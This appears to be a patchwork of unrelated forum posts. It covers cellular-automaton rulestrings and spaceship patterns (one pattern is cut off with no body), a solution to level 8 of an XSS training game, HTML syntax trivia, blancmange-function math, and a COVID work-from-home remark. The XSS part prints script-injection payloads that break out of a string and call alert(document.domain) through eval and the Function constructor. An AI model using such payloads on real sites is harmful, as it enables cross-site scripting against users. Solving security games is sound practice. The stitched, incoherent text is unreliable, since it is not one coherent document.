The rule B2n3-n4k6ak7c/S1c2-i3-kn4y6e8 strictly prohibits the existence of diagonal spaceships.

No common small diagonal spaceship does not mean no diagonal spaceship.

There's hope. Look at the following pattern:

Code: Select all

x = 6, y = 10, rule = B2n3-n4k6ak7c/S1c2-i3-kn4y6e8
bo$2o3bo$ob3o$3bobo$bobobo$2bo2bo$3bo$3b2o$5bo$4bo!
#C [[ STOP 4 ]]
Its front end actually moves one cell diagonally to the upper-left. I'm running a c/4d search.

EDIT: Look, here is what my search have found. Is this "no diagonal spaceship"?

Code: Select all

x = 8, y = 8, rule = B2n3-n4k6ak7c/S1c2-i3-kn4y6e8
2bo3bo$b5obo$bob2o2$bo$o2bo2$b2o!
Nice rule by the way, probably better than half of the rules I have found. Needs investigating. Will investigate!

A summary of the rule:

It has one c/3 pi ship and two 2c/9 ships:

Code: Select all

x = 4, y = 20, rule = B2n3-n4k6ak7c/S1c2-i3-kn4y6e8
2bo$bo$o$bo5$3o$o$3o5$3o$2bo$o2bo$2bo$3o!
EDIT: As usual, 2Pi collisions:

Code: Select all

x = 54, y = 87, rule = B2n3-n4k6ak7c/S1c2-i3-kn4y6e8

XSS

Post by PkmnQ »

I wanna talk about this xss game. In particular, level 8 and how I solved it.

So I looked in the HTML and looked for "your_payload" somewhere and found it.

Code: Select all

<script>
b = 1
if ( b == 2 ){ a = "your_payload" };

</script>
First I tried a ", and it worked.

Code: Select all

<script>
b = 1
if ( b == 2 ){ a = """ };

</script>
So I went on ahead, ea-

Code: Select all

<script>
b = 1
if ( b == 2 ){ a = ""};
Alert(document.domain)//" };

</script>
oh

So I tried an eval, and it didn't work either.

Code: Select all

<script>
b = 1
if ( b == 2 ){ a = ""};
Eval("a"+"lert(document.domain)")//" };

</script>
But I had one more trick, which I had learned from JSFuck.
Say hello to the function constructor.

Code: Select all

<script>
b = 1
if ( b == 2 ){ a = ""};
Function.constructor("a"+"lert(document.domain)")()//" };

</script>
Nothing wrong with the code, the Function is supposed to be capitalized.

Here's a link to see it in action.

I decided to see what characters you could put at the end of html tags to have it still valid, and I found that ↵ works.
No, seriously, put <p↵↵↵↵↵↵↵↵↵↵>Test</p↵↵↵↵↵↵↵↵↵↵> in some html file and it still works!

I just defined a hierarchy of blancmange functions
https://www.desmos.com/calculator/ogecaggf7m

So
The definition is
s_1(x,y) = |(x*2^y)-round(x*2^y)|
s_n(x,y) = s_1(f_(a-1)(x,y),0)
f_a(x,y) = sum from y to inf of s_a(x,n)/2^n

The graph there, btw, is f_2(x,1) or something like that

Fun fact:
For the triangle wave function f(x) =|x-round(x)|, f''(x)f(x)+f'(x)^2 = 1 where it is differentiable
Proofs:
1) This is because f'(x) = sign(x-round(x)) (can be shown)
Therefore f''(x) = 0
therefore f''(x)f(x)+f'(x)^2 = 0+f'(x)^2
since sign(anything)^2 = 1, 0+f'(x)^2 = 1.

2) f''(x)f(x)+f'(x)^2 = d/dx(f'(x)f(x)) which has slope 1 everywhere it is differentiable. Therefore it is 1

Looking at some of other people's rules (with a lots of characters) makes my eyes bleed so much (not literally) that I need to stick with my own rules. There are few rules that I don't get my eyes bleeding. The ones that are unique or more official (which exists).

No need to pay attention to the non-totalistic rulestrings... just enjoy the view :mrgreen: .
Dunno what you mean by more official rules.
Also if youre afraid of long rulestrings then you're gonna miss out on a lot of cool rules.

I am on mandatory WFH in Santa Clara county California. My kids' schools are closed for at least 4 weeks and I'm on voluntarily semi-quarantine (not going out of my way to move in crowds and spread the virus around but I can shop if I have to). Based on what's happening in Italy, I see no evidence to suggest that the US will be any better off. We need to stop the spread right now, and I suspect the virus is much more widespread than most people think.
